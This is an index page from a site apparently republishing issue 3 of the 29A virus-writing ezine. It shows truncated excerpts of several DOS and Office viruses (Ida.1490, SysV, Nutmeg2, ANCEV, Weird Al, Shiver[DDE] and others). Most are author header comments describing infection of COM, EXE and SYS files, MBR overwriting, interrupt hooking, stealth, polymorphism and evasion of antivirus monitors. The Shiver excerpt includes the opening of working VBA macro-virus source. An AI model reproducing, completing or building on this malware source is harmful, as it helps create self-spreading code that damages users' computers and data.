29A

Administrator: eZine
Created 28 Dec 2019
173 Articles

29A Issue 03 06 16

eZine lover (@eZine)
Published in 
 · 28 Dec 2019
comment * Ida.1490, disassembly by Darkman/29A. Ida.1490 is a 1491 bytes parasitic resident COM virus. Infects files at open file, get or set file attributes, load and execute program and rename file by appending the virus to the infected file. Ida.1490 has an error handler, non-destructive payload, second layer 16-bit exclusive OR (XOR) encryption in file and is polymorphic in file using its internal polymorphic engine. Ida.1490 is using the Random Decoding Key (RDK) technique. I would like to thank VirusBuster for pr...

29A Issue 03 06 15

eZine lover (@eZine)
Published in 
 · 28 Dec 2019
[sysv.asm]
;[SysV] Resident SYS infector
;Copyright 1998 (c) Vecna
;
;This tiny virus, written to CyberYoda 150 bytes virus contest, is a resident
;SYS infector. It infect all SYS files closed(this mean copyed too). It use
;interruption substitution as a effective antidebugging trick against real
;mode debuggers, and goes resident in the IVT.
;
;At load, the infected SYS jump to the virus installer, that check for a copy
;already resident. If so, we return to the host, else we copy ourself to the
;IVT at 0x20:0, hook interrupt 0x21, saving the original vector to interrup...

29A Issue 03 06 14

eZine lover (@eZine)
Published in 
 · 28 Dec 2019
; 29A Laboratories
;
; Replicant name.............Ithaqua
; Brain engineer.............Wintermute/29A
; Model......................Advanced Nexus-6 Final Beta
; Corporal type..............Unknown
; Size.......................8543 celular units
; Date of Birth..............28/9/1998
; Date of Termination........Reserved
;
; Ithaqua replicant significative data
; ...

29A Issue 03 06 13

eZine lover (@eZine)
Published in 
 · 28 Dec 2019
{ [Nutmeg2] Turbo Pascal Multipartite EXE/MBR infector Copyright 1998 (c) Vecna This is the first know virus written in HLL that infect the MBR also. It infect the owner of the envirment in each interupt 0x28 call, that is called when DOS is idle. The virus place itself in the start of the infected file, adding 4096 bytes to it. It is a prepender that reexecute the host, but with the original name, so, if the host program goes memory resident, MEM.EXE dont show a foreign program as resident. It also have the so called "host stealth", infecting all files, including these with self-checks. Two external assembler routines are used to gi...

29A Issue 03 06 12

eZine lover (@eZine)
Published in 
 · 28 Dec 2019
;[ANCEV] Multipartite MBR/COM stealth infector
;Copyright 1998 (c) Vecna
;
;When started, the virus check if a PSP exist in ds:0. If true, then we are in
;a infected file, so, we should infected the MBR and return to the host. A
;quick check for memory resident copy is done then. To infected the MBR, we
;read it, and check for a 0xE8 opcode(call). If it exists then we already are
;in the MBR, and dont infect it again. The clean copy of the MBR is stored
;in 0/0/2, and the MBR is overwritten by the virus code and memory contents,
;but before we write it, we put the marker (0xAA55) in the offset 0x1FE. The
;partition table is o...

29A Issue 03 06 11

eZine lover (@eZine)
Published in 
 · 28 Dec 2019
comment ^ DOS.ExeHeader.Numbless.512 (c) 1998 by Jacky Qwerty/29A. Description Ok, I had never written an ExeHeader virus, so I wrote this. It's a simple DOS EXE infector which spreads by inserting itself through the blank spaces of the exe header left by several compilers and assemblers. It basically converts an EXE file into a COM image, hooks Int 13h and monitors disk reads/writes at the sector level. When "something" looks like an MZ header the virus looks for enough blanks in such header and copies itself to there. The virus is "full stealth" and doesn't infect EXE files larger than 64 Kb for obvious reasons. It neither infe...

29A Issue 03 06 10

eZine lover (@eZine)
Published in 
 · 28 Dec 2019
===========================
Strange Days by Reptile/29A
---------------------------
This is the first macro virus (written in VBA) that can infect doc files and normal.dot (word97) as well as xls files and personal.xls (excel97).
===========================

Here is the original source of Strange Days (called Teocatl.A by AVerz :P).

http://www.avp.ch/avpve/macro/xmulti/teocatl.stm:
----------------------------------------------------------------------------
Macro.Excel97/Word97.Teocatl This...

29A Issue 03 06 09

eZine lover (@eZine)
Published in 
 · 28 Dec 2019
'='='='='='='='='='='='='='='='='='='='='= ' Shiver[DDE] by ALT-F11 /AVM ' The First Macro Virus To Use DDE ' Cross Application Virus (Word97/Excel97) ' Does NOT Need Debug.exe To Cross Infect '='='='='='='='='='='='='='='='='='='='='= Attribute VB_Name = "Module1" Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal strClass Name As String, ByVal lpWindowName As Any) As Long Public ExcelFound, WordFound, Marker, JustRun As Boolean Sub AutoExec() On Error Resume Next Call WordStealth If UCase(Dir(Application.StartupPath & "\Word8.dot")) <> "WORD8.DOT" Then Documents.Add Template:="", NewTemplate:=False Open "c:...

29A Issue 03 06 08

eZine lover (@eZine)
Published in 
 · 28 Dec 2019
;=====( DSA2 Virus by Rajaat / 29A )===========================================
;
; Virus name    : DSA2
; Author        : Rajaat / 29A
; Origin        : United Kingdom, December 1997
; Compiling     : Using TASM
;
;                 TASM /M DSA2
;                 TLINK /T DSA2
; Targets       : COM files
; Size          : 245 bytes
; Resident      : Yes, doesn't decrease memory
; Polymorphic   : No
; Encrypted     : No
; Stealth       : No
; Tunneling     : Uses SFT to avoid some monitors
; Retrovirus    : No
; Antiheuristics: Only TBSpoof
; Peculiarities : It won't get far
; Drawbacks     : Don't write me, I know all of them ;-)
; Behaviour     : When an infected COM file is executed, the virus will
;                 go resident in th...

29A Issue 03 06 07

eZine lover (@eZine)
Published in 
 · 28 Dec 2019
;=====( Weird Al Virus by Rajaat / 29A )=======================================
;
; Virus name    : Weird Al
; Author        : Rajaat / 29A
; Origin        : United Kingdom, March 1998
; Compiling     : Using TASM
;
;                 TASM /M WEIRDAL
;                 TLINK /T WEIRDAL
; Targets       : MBR & COM files
; Size          : 512 bytes
; Resident      : Yes, from MBR only (no TOM decrease)
; Polymorphic   : No
; Encrypted     : No
; Stealth       : MBR only, reads and write
; Tunneling     : Uses SFT to avoid some monitors
; Retrovirus    : Yes, it uses the recursive extended partition trick
; Antiheuristics: Not deliberately
; Peculiarities : Nothing, I think, it's been a little exercise for me
; Drawb...